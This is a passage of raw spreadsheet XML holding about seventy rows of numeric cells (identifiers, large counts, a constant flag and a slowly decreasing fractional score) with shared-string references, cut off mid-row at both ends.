    <row r="6018" ht="15.75" customHeight="1">
      <c r="A6018" s="1">
        <v>26226.0</v>
      </c>
      <c r="B6018" s="2">
        <v>1.6279652E7</v>
      </c>
      <c r="C6018" s="2" t="s">
        <v>5734</v>
      </c>
      <c r="D6018" s="2">
        <v>1.0</v>
      </c>
      <c r="E6018" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6018" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6019" ht="15.75" customHeight="1">
      <c r="A6019" s="1">
        <v>26369.0</v>
      </c>
      <c r="B6019" s="2">
        <v>1.6888139E7</v>
      </c>
      <c r="C6019" s="2" t="s">
        <v>5735</v>
      </c>
      <c r="D6019" s="2">
        <v>1.0</v>
      </c>
      <c r="E6019" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6019" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6020" ht="15.75" customHeight="1">
      <c r="A6020" s="1">
        <v>26780.0</v>
      </c>
      <c r="B6020" s="2">
        <v>1.8536828E7</v>
      </c>
      <c r="C6020" s="2" t="s">
        <v>5736</v>
      </c>
      <c r="D6020" s="2">
        <v>1.0</v>
      </c>
      <c r="E6020" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6020" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6021" ht="15.75" customHeight="1">
      <c r="A6021" s="1">
        <v>26977.0</v>
      </c>
      <c r="B6021" s="2">
        <v>1.9714399E7</v>
      </c>
      <c r="C6021" s="2" t="s">
        <v>5737</v>
      </c>
      <c r="D6021" s="2">
        <v>1.0</v>
      </c>
      <c r="E6021" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6021" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6022" ht="15.75" customHeight="1">
      <c r="A6022" s="1">
        <v>27602.0</v>
      </c>
      <c r="B6022" s="2">
        <v>2.2623083E7</v>
      </c>
      <c r="C6022" s="2" t="s">
        <v>5738</v>
      </c>
      <c r="D6022" s="2">
        <v>1.0</v>
      </c>
      <c r="E6022" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6022" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6023" ht="15.75" customHeight="1">
      <c r="A6023" s="1">
        <v>28300.0</v>
      </c>
      <c r="B6023" s="2">
        <v>2.5604602E7</v>
      </c>
      <c r="C6023" s="2" t="s">
        <v>5723</v>
      </c>
      <c r="D6023" s="2">
        <v>1.0</v>
      </c>
      <c r="E6023" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6023" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6024" ht="15.75" customHeight="1">
      <c r="A6024" s="1">
        <v>28365.0</v>
      </c>
      <c r="B6024" s="2">
        <v>2.6033245E7</v>
      </c>
      <c r="C6024" s="2" t="s">
        <v>5739</v>
      </c>
      <c r="D6024" s="2">
        <v>1.0</v>
      </c>
      <c r="E6024" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6024" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6025" ht="15.75" customHeight="1">
      <c r="A6025" s="1">
        <v>29206.0</v>
      </c>
      <c r="B6025" s="2">
        <v>3.0778249E7</v>
      </c>
      <c r="C6025" s="2" t="s">
        <v>5740</v>
      </c>
      <c r="D6025" s="2">
        <v>1.0</v>
      </c>
      <c r="E6025" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6025" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6026" ht="15.75" customHeight="1">
      <c r="A6026" s="1">
        <v>29967.0</v>
      </c>
      <c r="B6026" s="2">
        <v>3.6089505E7</v>
      </c>
      <c r="C6026" s="2" t="s">
        <v>5741</v>
      </c>
      <c r="D6026" s="2">
        <v>1.0</v>
      </c>
      <c r="E6026" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6026" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6027" ht="15.75" customHeight="1">
      <c r="A6027" s="1">
        <v>29999.0</v>
      </c>
      <c r="B6027" s="2">
        <v>3612938.0</v>
      </c>
      <c r="C6027" s="2" t="s">
        <v>5742</v>
      </c>
      <c r="D6027" s="2">
        <v>1.0</v>
      </c>
      <c r="E6027" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6027" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6028" ht="15.75" customHeight="1">
      <c r="A6028" s="1">
        <v>30214.0</v>
      </c>
      <c r="B6028" s="2">
        <v>3.7395961E7</v>
      </c>
      <c r="C6028" s="2" t="s">
        <v>5743</v>
      </c>
      <c r="D6028" s="2">
        <v>1.0</v>
      </c>
      <c r="E6028" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6028" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6029" ht="15.75" customHeight="1">
      <c r="A6029" s="1">
        <v>30956.0</v>
      </c>
      <c r="B6029" s="2">
        <v>4742843.0</v>
      </c>
      <c r="C6029" s="2" t="s">
        <v>5744</v>
      </c>
      <c r="D6029" s="2">
        <v>1.0</v>
      </c>
      <c r="E6029" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6029" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6030" ht="15.75" customHeight="1">
      <c r="A6030" s="1">
        <v>31818.0</v>
      </c>
      <c r="B6030" s="2">
        <v>5252596.0</v>
      </c>
      <c r="C6030" s="2" t="s">
        <v>5745</v>
      </c>
      <c r="D6030" s="2">
        <v>1.0</v>
      </c>
      <c r="E6030" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6030" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6031" ht="15.75" customHeight="1">
      <c r="A6031" s="1">
        <v>32140.0</v>
      </c>
      <c r="B6031" s="2">
        <v>5420606.0</v>
      </c>
      <c r="C6031" s="2" t="s">
        <v>5746</v>
      </c>
      <c r="D6031" s="2">
        <v>1.0</v>
      </c>
      <c r="E6031" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6031" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6032" ht="15.75" customHeight="1">
      <c r="A6032" s="1">
        <v>32231.0</v>
      </c>
      <c r="B6032" s="2">
        <v>5.4972229E7</v>
      </c>
      <c r="C6032" s="2" t="s">
        <v>5747</v>
      </c>
      <c r="D6032" s="2">
        <v>1.0</v>
      </c>
      <c r="E6032" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6032" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6033" ht="15.75" customHeight="1">
      <c r="A6033" s="1">
        <v>32733.0</v>
      </c>
      <c r="B6033" s="2">
        <v>6014998.0</v>
      </c>
      <c r="C6033" s="2" t="s">
        <v>5745</v>
      </c>
      <c r="D6033" s="2">
        <v>1.0</v>
      </c>
      <c r="E6033" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6033" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6034" ht="15.75" customHeight="1">
      <c r="A6034" s="1">
        <v>27304.0</v>
      </c>
      <c r="B6034" s="2">
        <v>2.1359977E7</v>
      </c>
      <c r="C6034" s="2" t="s">
        <v>5748</v>
      </c>
      <c r="D6034" s="2">
        <v>1.0</v>
      </c>
      <c r="E6034" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6034" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="6035" ht="15.75" customHeight="1">
      <c r="A6035" s="1">
        <v>29368.0</v>
      </c>
      <c r="B6035" s="2">
        <v>3.1672456E7</v>
      </c>
      <c r="C6035" s="2" t="s">
        <v>5749</v>
      </c>
      <c r="D6035" s="2">
        <v>1.0</v>
      </c>
      <c r="E6035" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6035" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="6036" ht="15.75" customHeight="1">
      <c r="A6036" s="1">
        <v>31467.0</v>
      </c>
      <c r="B6036" s="2">
        <v>5044434.0</v>
      </c>
      <c r="C6036" s="2" t="s">
        <v>5750</v>
      </c>
      <c r="D6036" s="2">
        <v>1.0</v>
      </c>
      <c r="E6036" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6036" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="6037" ht="15.75" customHeight="1">
      <c r="A6037" s="1">
        <v>16465.0</v>
      </c>
      <c r="B6037" s="2">
        <v>4.6464496E7</v>
      </c>
      <c r="C6037" s="2" t="s">
        <v>5751</v>
      </c>
      <c r="D6037" s="2">
        <v>1.0</v>
      </c>
      <c r="E6037" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6037" s="2">
        <v>0.1277777777777778</v>
      </c>
    </row>
    <row r="6038" ht="15.75" customHeight="1">
      <c r="A6038" s="1">
        <v>13417.0</v>
      </c>
      <c r="B6038" s="2">
        <v>3.5023938E7</v>
      </c>
      <c r="C6038" s="2" t="s">
        <v>5752</v>
      </c>
      <c r="D6038" s="2">
        <v>1.0</v>
      </c>
      <c r="E6038" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6038" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="6039" ht="15.75" customHeight="1">
      <c r="A6039" s="1">
        <v>23633.0</v>
      </c>
      <c r="B6039" s="2">
        <v>6601667.0</v>
      </c>
      <c r="C6039" s="2" t="s">
        <v>5753</v>
      </c>
      <c r="D6039" s="2">
        <v>1.0</v>
      </c>
      <c r="E6039" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6039" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="6040" ht="15.75" customHeight="1">
      <c r="A6040" s="1">
        <v>32960.0</v>
      </c>
      <c r="B6040" s="2">
        <v>6514736.0</v>
      </c>
      <c r="C6040" s="2" t="s">
        <v>5754</v>
      </c>
      <c r="D6040" s="2">
        <v>1.0</v>
      </c>
      <c r="E6040" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6040" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="6041" ht="15.75" customHeight="1">
      <c r="A6041" s="1">
        <v>15445.0</v>
      </c>
      <c r="B6041" s="2">
        <v>4.3023877E7</v>
      </c>
      <c r="C6041" s="2" t="s">
        <v>5755</v>
      </c>
      <c r="D6041" s="2">
        <v>1.0</v>
      </c>
      <c r="E6041" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6041" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="6042" ht="15.75" customHeight="1">
      <c r="A6042" s="1">
        <v>25180.0</v>
      </c>
      <c r="B6042" s="2">
        <v>1.312275E7</v>
      </c>
      <c r="C6042" s="2" t="s">
        <v>5756</v>
      </c>
      <c r="D6042" s="2">
        <v>1.0</v>
      </c>
      <c r="E6042" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6042" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="6043" ht="15.75" customHeight="1">
      <c r="A6043" s="1">
        <v>29144.0</v>
      </c>
      <c r="B6043" s="2">
        <v>3.0581792E7</v>
      </c>
      <c r="C6043" s="2" t="s">
        <v>5757</v>
      </c>
      <c r="D6043" s="2">
        <v>1.0</v>
      </c>
      <c r="E6043" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6043" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="6044" ht="15.75" customHeight="1">
      <c r="A6044" s="1">
        <v>30201.0</v>
      </c>
      <c r="B6044" s="2">
        <v>3.7278972E7</v>
      </c>
      <c r="C6044" s="2" t="s">
        <v>5758</v>
      </c>
      <c r="D6044" s="2">
        <v>1.0</v>
      </c>
      <c r="E6044" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6044" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="6045" ht="15.75" customHeight="1">
      <c r="A6045" s="1">
        <v>26710.0</v>
      </c>
      <c r="B6045" s="2">
        <v>1.8188935E7</v>
      </c>
      <c r="C6045" s="2" t="s">
        <v>5759</v>
      </c>
      <c r="D6045" s="2">
        <v>1.0</v>
      </c>
      <c r="E6045" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6045" s="2">
        <v>0.1275430359937402</v>
      </c>
    </row>
    <row r="6046" ht="15.75" customHeight="1">
      <c r="A6046" s="1">
        <v>4215.0</v>
      </c>
      <c r="B6046" s="2">
        <v>4.17023E7</v>
      </c>
      <c r="C6046" s="2" t="s">
        <v>5760</v>
      </c>
      <c r="D6046" s="2">
        <v>1.0</v>
      </c>
      <c r="E6046" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6046" s="2">
        <v>0.1273946360153257</v>
      </c>
    </row>
    <row r="6047" ht="15.75" customHeight="1">
      <c r="A6047" s="1">
        <v>26482.0</v>
      </c>
      <c r="B6047" s="2">
        <v>1.7458313E7</v>
      </c>
      <c r="C6047" s="2" t="s">
        <v>5761</v>
      </c>
      <c r="D6047" s="2">
        <v>1.0</v>
      </c>
      <c r="E6047" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6047" s="2">
        <v>0.1273946360153257</v>
      </c>
    </row>
    <row r="6048" ht="15.75" customHeight="1">
      <c r="A6048" s="1">
        <v>28279.0</v>
      </c>
      <c r="B6048" s="2">
        <v>2.5474446E7</v>
      </c>
      <c r="C6048" s="2" t="s">
        <v>5762</v>
      </c>
      <c r="D6048" s="2">
        <v>1.0</v>
      </c>
      <c r="E6048" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6048" s="2">
        <v>0.1273946360153257</v>
      </c>
    </row>
    <row r="6049" ht="15.75" customHeight="1">
      <c r="A6049" s="1">
        <v>32833.0</v>
      </c>
      <c r="B6049" s="2">
        <v>6240383.0</v>
      </c>
      <c r="C6049" s="2" t="s">
        <v>5763</v>
      </c>
      <c r="D6049" s="2">
        <v>1.0</v>
      </c>
      <c r="E6049" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6049" s="2">
        <v>0.1273946360153257</v>
      </c>
    </row>
    <row r="6050" ht="15.75" customHeight="1">
      <c r="A6050" s="1">
        <v>25937.0</v>
      </c>
      <c r="B6050" s="2">
        <v>1.5230907E7</v>
      </c>
      <c r="C6050" s="2" t="s">
        <v>5764</v>
      </c>
      <c r="D6050" s="2">
        <v>1.0</v>
      </c>
      <c r="E6050" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6050" s="2">
        <v>0.1273504273504274</v>
      </c>
    </row>
    <row r="6051" ht="15.75" customHeight="1">
      <c r="A6051" s="1">
        <v>30679.0</v>
      </c>
      <c r="B6051" s="2">
        <v>4.2342594E7</v>
      </c>
      <c r="C6051" s="2" t="s">
        <v>5765</v>
      </c>
      <c r="D6051" s="2">
        <v>1.0</v>
      </c>
      <c r="E6051" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6051" s="2">
        <v>0.1273504273504274</v>
      </c>
    </row>
    <row r="6052" ht="15.75" customHeight="1">
      <c r="A6052" s="1">
        <v>13130.0</v>
      </c>
      <c r="B6052" s="2">
        <v>3.3665554E7</v>
      </c>
      <c r="C6052" s="2" t="s">
        <v>5766</v>
      </c>
      <c r="D6052" s="2">
        <v>1.0</v>
      </c>
      <c r="E6052" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6052" s="2">
        <v>0.1273148148148149</v>
      </c>
    </row>
    <row r="6053" ht="15.75" customHeight="1">
      <c r="A6053" s="1">
        <v>24303.0</v>
      </c>
      <c r="B6053" s="2">
        <v>1.0572475E7</v>
      </c>
      <c r="C6053" s="2" t="s">
        <v>5767</v>
      </c>
      <c r="D6053" s="2">
        <v>1.0</v>
      </c>
      <c r="E6053" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6053" s="2">
        <v>0.1273148148148149</v>
      </c>
    </row>
    <row r="6054" ht="15.75" customHeight="1">
      <c r="A6054" s="1">
        <v>25113.0</v>
      </c>
      <c r="B6054" s="2">
        <v>1.2969432E7</v>
      </c>
      <c r="C6054" s="2" t="s">
        <v>5768</v>
      </c>
      <c r="D6054" s="2">
        <v>1.0</v>
      </c>
      <c r="E6054" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6054" s="2">
        <v>0.1273148148148149</v>
      </c>
    </row>
    <row r="6055" ht="15.75" customHeight="1">
      <c r="A6055" s="1">
        <v>11351.0</v>
      </c>
      <c r="B6055" s="2">
        <v>2.1293802E7</v>
      </c>
      <c r="C6055" s="2" t="s">
        <v>5769</v>
      </c>
      <c r="D6055" s="2">
        <v>1.0</v>
      </c>
      <c r="E6055" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6055" s="2">
        <v>0.1271186440677966</v>
      </c>
    </row>
    <row r="6056" ht="15.75" customHeight="1">
      <c r="A6056" s="1">
        <v>21345.0</v>
      </c>
      <c r="B6056" s="2">
        <v>2.1219189E7</v>
      </c>
      <c r="C6056" s="2" t="s">
        <v>5770</v>
      </c>
      <c r="D6056" s="2">
        <v>1.0</v>
      </c>
      <c r="E6056" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6056" s="2">
        <v>0.1271186440677966</v>
      </c>
    </row>
    <row r="6057" ht="15.75" customHeight="1">
      <c r="A6057" s="1">
        <v>33013.0</v>
      </c>
      <c r="B6057" s="2">
        <v>6650387.0</v>
      </c>
      <c r="C6057" s="2" t="s">
        <v>5771</v>
      </c>
      <c r="D6057" s="2">
        <v>1.0</v>
      </c>
      <c r="E6057" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6057" s="2">
        <v>0.1271043771043771</v>
      </c>
    </row>
    <row r="6058" ht="15.75" customHeight="1">
      <c r="A6058" s="1">
        <v>22679.0</v>
      </c>
      <c r="B6058" s="2">
        <v>4.1841731E7</v>
      </c>
      <c r="C6058" s="2" t="s">
        <v>5772</v>
      </c>
      <c r="D6058" s="2">
        <v>1.0</v>
      </c>
      <c r="E6058" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6058" s="2">
        <v>0.1268343815513627</v>
      </c>
    </row>
    <row r="6059" ht="15.75" customHeight="1">
      <c r="A6059" s="1">
        <v>26297.0</v>
      </c>
      <c r="B6059" s="2">
        <v>1.6556716E7</v>
      </c>
      <c r="C6059" s="2" t="s">
        <v>5773</v>
      </c>
      <c r="D6059" s="2">
        <v>1.0</v>
      </c>
      <c r="E6059" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6059" s="2">
        <v>0.1265938069216758</v>
      </c>
    </row>
    <row r="6060" ht="15.75" customHeight="1">
      <c r="A6060" s="1">
        <v>28055.0</v>
      </c>
      <c r="B6060" s="2">
        <v>2.4571413E7</v>
      </c>
      <c r="C6060" s="2" t="s">
        <v>5774</v>
      </c>
      <c r="D6060" s="2">
        <v>1.0</v>
      </c>
      <c r="E6060" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6060" s="2">
        <v>0.1265938069216758</v>
      </c>
    </row>
    <row r="6061" ht="15.75" customHeight="1">
      <c r="A6061" s="1">
        <v>28271.0</v>
      </c>
      <c r="B6061" s="2">
        <v>2.5377927E7</v>
      </c>
      <c r="C6061" s="2" t="s">
        <v>5775</v>
      </c>
      <c r="D6061" s="2">
        <v>1.0</v>
      </c>
      <c r="E6061" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6061" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="6062" ht="15.75" customHeight="1">
      <c r="A6062" s="1">
        <v>29533.0</v>
      </c>
      <c r="B6062" s="2">
        <v>3.282336E7</v>
      </c>
      <c r="C6062" s="2" t="s">
        <v>5776</v>
      </c>
      <c r="D6062" s="2">
        <v>1.0</v>
      </c>
      <c r="E6062" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6062" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="6063" ht="15.75" customHeight="1">
      <c r="A6063" s="1">
        <v>20332.0</v>
      </c>
      <c r="B6063" s="2">
        <v>1.1522126E7</v>
      </c>
      <c r="C6063" s="2" t="s">
        <v>5777</v>
      </c>
      <c r="D6063" s="2">
        <v>1.0</v>
      </c>
      <c r="E6063" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6063" s="2">
        <v>0.1263440860215054</v>
      </c>
    </row>
    <row r="6064" ht="15.75" customHeight="1">
      <c r="A6064" s="1">
        <v>28471.0</v>
      </c>
      <c r="B6064" s="2">
        <v>2.6615476E7</v>
      </c>
      <c r="C6064" s="2" t="s">
        <v>5778</v>
      </c>
      <c r="D6064" s="2">
        <v>1.0</v>
      </c>
      <c r="E6064" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6064" s="2">
        <v>0.1263440860215054</v>
      </c>
    </row>
    <row r="6065" ht="15.75" customHeight="1">
      <c r="A6065" s="1">
        <v>23759.0</v>
      </c>
      <c r="B6065" s="2">
        <v>7496411.0</v>
      </c>
      <c r="C6065" s="2" t="s">
        <v>5779</v>
      </c>
      <c r="D6065" s="2">
        <v>1.0</v>
      </c>
      <c r="E6065" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6065" s="2">
        <v>0.1262626262626263</v>
      </c>
    </row>
    <row r="6066" ht="15.75" customHeight="1">
      <c r="A6066" s="1">
        <v>9668.0</v>
      </c>
      <c r="B6066" s="2">
        <v>5.6310433E7</v>
      </c>
      <c r="C6066" s="2" t="s">
        <v>5780</v>
      </c>
      <c r="D6066" s="2">
        <v>1.0</v>
      </c>
      <c r="E6066" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6066" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="6067" ht="15.75" customHeight="1">
      <c r="A6067" s="1">
        <v>21133.0</v>
      </c>
      <c r="B6067" s="2">
        <v>1.8460271E7</v>
      </c>
      <c r="C6067" s="2" t="s">
        <v>5781</v>
      </c>
      <c r="D6067" s="2">
        <v>1.0</v>
      </c>
      <c r="E6067" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6067" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="6068" ht="15.75" customHeight="1">
      <c r="A6068" s="1">
        <v>21732.0</v>
      </c>
      <c r="B6068" s="2">
        <v>2.5731168E7</v>
      </c>
      <c r="C6068" s="2" t="s">
        <v>5782</v>
      </c>
      <c r="D6068" s="2">
        <v>1.0</v>
      </c>
      <c r="E6068" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6068" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="6069" ht="15.75" customHeight="1">
      <c r="A6069" s="1">
        <v>22682.0</v>
      </c>
      <c r="B6069" s="2">
        <v>4.2024022E7</v>
      </c>
      <c r="C6069" s="2" t="s">
        <v>5783</v>
      </c>
      <c r="D6069" s="2">
        <v>1.0</v>
      </c>
      <c r="E6069" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6069" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="6070" ht="15.75" customHeight="1">
      <c r="A6070" s="1">
        <v>32534.0</v>
      </c>
      <c r="B6070" s="2">
        <v>5735025.0</v>
      </c>
      <c r="C6070" s="2" t="s">
        <v>5784</v>
      </c>
      <c r="D6070" s="2">
        <v>1.0</v>
      </c>
      <c r="E6070" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6070" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="6071" ht="15.75" customHeight="1">
      <c r="A6071" s="1">
        <v>23945.0</v>
      </c>
      <c r="B6071" s="2">
        <v>8847949.0</v>
      </c>
      <c r="C6071" s="2" t="s">
        <v>5785</v>
      </c>
      <c r="D6071" s="2">
        <v>1.0</v>
      </c>
      <c r="E6071" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6071" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="6072" ht="15.75" customHeight="1">
      <c r="A6072" s="1">
        <v>27281.0</v>
      </c>
      <c r="B6072" s="2">
        <v>2.1230297E7</v>
      </c>
      <c r="C6072" s="2" t="s">
        <v>5786</v>
      </c>
      <c r="D6072" s="2">
        <v>1.0</v>
      </c>
      <c r="E6072" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6072" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="6073" ht="15.75" customHeight="1">
      <c r="A6073" s="1">
        <v>28865.0</v>
      </c>
      <c r="B6073" s="2">
        <v>2.9071061E7</v>
      </c>
      <c r="C6073" s="2" t="s">
        <v>5787</v>
      </c>
      <c r="D6073" s="2">
        <v>1.0</v>
      </c>
      <c r="E6073" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6073" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="6074" ht="15.75" customHeight="1">
      <c r="A6074" s="1">
        <v>30487.0</v>
      </c>
      <c r="B6074" s="2">
        <v>3.9895703E7</v>
      </c>
      <c r="C6074" s="2" t="s">
        <v>5788</v>
      </c>
      <c r="D6074" s="2">
        <v>1.0</v>
      </c>
      <c r="E6074" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6074" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="6075" ht="15.75" customHeight="1">
      <c r="A6075" s="1">
        <v>30873.0</v>
      </c>
      <c r="B6075" s="2">
        <v>4.6297572E7</v>
      </c>
      <c r="C6075" s="2" t="s">
        <v>5789</v>
      </c>
      <c r="D6075" s="2">
        <v>1.0</v>
      </c>
      <c r="E6075" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6075" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="6076" ht="15.75" customHeight="1">
      <c r="A6076" s="1">
        <v>33745.0</v>
      </c>
      <c r="B6076" s="2">
        <v>8568755.0</v>
      </c>
      <c r="C6076" s="2" t="s">
        <v>5790</v>
      </c>
      <c r="D6076" s="2">
        <v>1.0</v>
      </c>
      <c r="E6076" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6076" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="6077" ht="15.75" customHeight="1">
      <c r="A6077" s="1">
        <v>33845.0</v>
      </c>
      <c r="B6077" s="2">
        <v>9013437.0</v>
      </c>
      <c r="C6077" s="2" t="s">
        <v>5791</v>
      </c>
      <c r="D6077" s="2">
        <v>1.0</v>
      </c>
      <c r="E6077" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6077" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="6078" ht="15.75" customHeight="1">
      <c r="A6078" s="1">
        <v>24450.0</v>
      </c>
      <c r="B6078" s="2">
        <v>1.0927936E7</v>
      </c>
      <c r="C6078" s="2" t="s">
        <v>5792</v>
      </c>
      <c r="D6078" s="2">
        <v>1.0</v>
      </c>
      <c r="E6078" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6078" s="2">
        <v>0.1258680555555556</v>
      </c>
    </row>
    <row r="6079" ht="15.75" customHeight="1">
      <c r="A6079" s="1">
        <v>24565.0</v>
      </c>
      <c r="B6079" s="2">
        <v>1.1304048E7</v>
      </c>
      <c r="C6079" s="2" t="s">
        <v>5793</v>
      </c>
      <c r="D6079" s="2">
        <v>1.0</v>
      </c>
      <c r="E6079" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6079" s="2">
        <v>0.1258680555555556</v>
      </c>
    </row>
    <row r="6080" ht="15.75" customHeight="1">
      <c r="A6080" s="1">
        <v>25935.0</v>
      </c>
      <c r="B6080" s="2">
        <v>1.5211928E7</v>
      </c>
      <c r="C6080" s="2" t="s">
        <v>5794</v>
      </c>
      <c r="D6080" s="2">
        <v>1.0</v>
      </c>
      <c r="E6080" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6080" s="2">
        <v>0.1258680555555556</v>
      </c>
    </row>
    <row r="6081" ht="15.75" customHeight="1">
      <c r="A6081" s="1">
        <v>8628.0</v>
      </c>
      <c r="B6081" s="2">
        <v>5.4312161E7</v>
      </c>
      <c r="C6081" s="2" t="s">
        <v>5795</v>
      </c>
      <c r="D6081" s="2">
        <v>1.0</v>
      </c>
      <c r="E6081" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6081" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6082" ht="15.75" customHeight="1">
      <c r="A6082" s="1">
        <v>20734.0</v>
      </c>
      <c r="B6082" s="2">
        <v>1.4733693E7</v>
      </c>
      <c r="C6082" s="2" t="s">
        <v>5796</v>
      </c>
      <c r="D6082" s="2">
        <v>1.0</v>
      </c>
      <c r="E6082" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6082" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6083" ht="15.75" customHeight="1">
      <c r="A6083" s="1">
        <v>21293.0</v>
      </c>
      <c r="B6083" s="2">
        <v>2.0544344E7</v>
      </c>
      <c r="C6083" s="2" t="s">
        <v>5797</v>
      </c>
      <c r="D6083" s="2">
        <v>1.0</v>
      </c>
      <c r="E6083" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6083" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6084" ht="15.75" customHeight="1">
      <c r="A6084" s="1">
        <v>21917.0</v>
      </c>
      <c r="B6084" s="2">
        <v>2.8206991E7</v>
      </c>
      <c r="C6084" s="2" t="s">
        <v>5798</v>
      </c>
      <c r="D6084" s="2">
        <v>1.0</v>
      </c>
      <c r="E6084" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6084" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6085" ht="15.75" customHeight="1">
